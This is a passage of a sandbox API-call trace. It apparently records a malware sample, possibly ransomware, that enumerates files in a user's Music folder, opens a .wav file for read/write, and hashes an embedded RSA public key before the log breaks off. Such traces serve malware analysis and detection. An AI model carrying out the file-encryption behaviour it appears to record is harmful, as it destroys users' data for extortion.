0x31b970 [0197.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.636] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\") returned="k8_cI3l6hV1-Y7\\" [0197.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.637] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\") returned="5U0VVnc3NrOc8n_Z\\" [0197.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea848 [0197.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.637] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0197.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea848 | out: hHeap=0x2c0000) returned 1 [0197.638] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.638] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.638] PathFindFileNameW (pszPath="") returned="" [0197.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.638] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\*" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\k8_ci3l6hv1-y7\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaea55950, ftCreationTime.dwHighDateTime=0x1d8a415, ftLastAccessTime.dwLowDateTime=0x2e598de0, ftLastAccessTime.dwHighDateTime=0x1d8a6fc, ftLastWriteTime.dwLowDateTime=0x2e598de0, ftLastWriteTime.dwHighDateTime=0x1d8a6fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0197.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.642] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaea55950, ftCreationTime.dwHighDateTime=0x1d8a415, ftLastAccessTime.dwLowDateTime=0x2e598de0, ftLastAccessTime.dwHighDateTime=0x1d8a6fc, ftLastWriteTime.dwLowDateTime=0x2e598de0, ftLastWriteTime.dwHighDateTime=0x1d8a6fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.642] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d838e0, ftCreationTime.dwHighDateTime=0x1d89f16, ftLastAccessTime.dwLowDateTime=0xc8169120, ftLastAccessTime.dwHighDateTime=0x1d89f28, ftLastWriteTime.dwLowDateTime=0xc8169120, ftLastWriteTime.dwHighDateTime=0x1d89f28, nFileSizeHigh=0x0, nFileSizeLow=0x1164a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27Qc0VUi07zkn_VUAary.wav", cAlternateFileName="27QC0V~1.WAV")) returned 1 [0197.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.642] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\27Qc0VUi07zkn_VUAary.wav") returned=".wav" [0197.642] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5U0VVnc3NrOc8n_Z\\k8_cI3l6hV1-Y7\\27Qc0VUi07zkn_VUAary.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5u0vvnc3nroc8n_z\\k8_ci3l6hv1-y7\\27qc0vui07zkn_vuaary.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.644] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=71242) returned 1 [0197.644] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.658] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11624, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.658] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.664] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.664] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1164a, lpOverlapped=0x0) returned 1 [0197.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.666] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.667] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.667] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.667] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.667] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.667] GetLastError () returned 0x0 [0197.667] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.667] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.668] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.668] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.668] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11650) returned 0x2af5168 [0197.669] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea848 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea890 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.670] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae67e8 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: 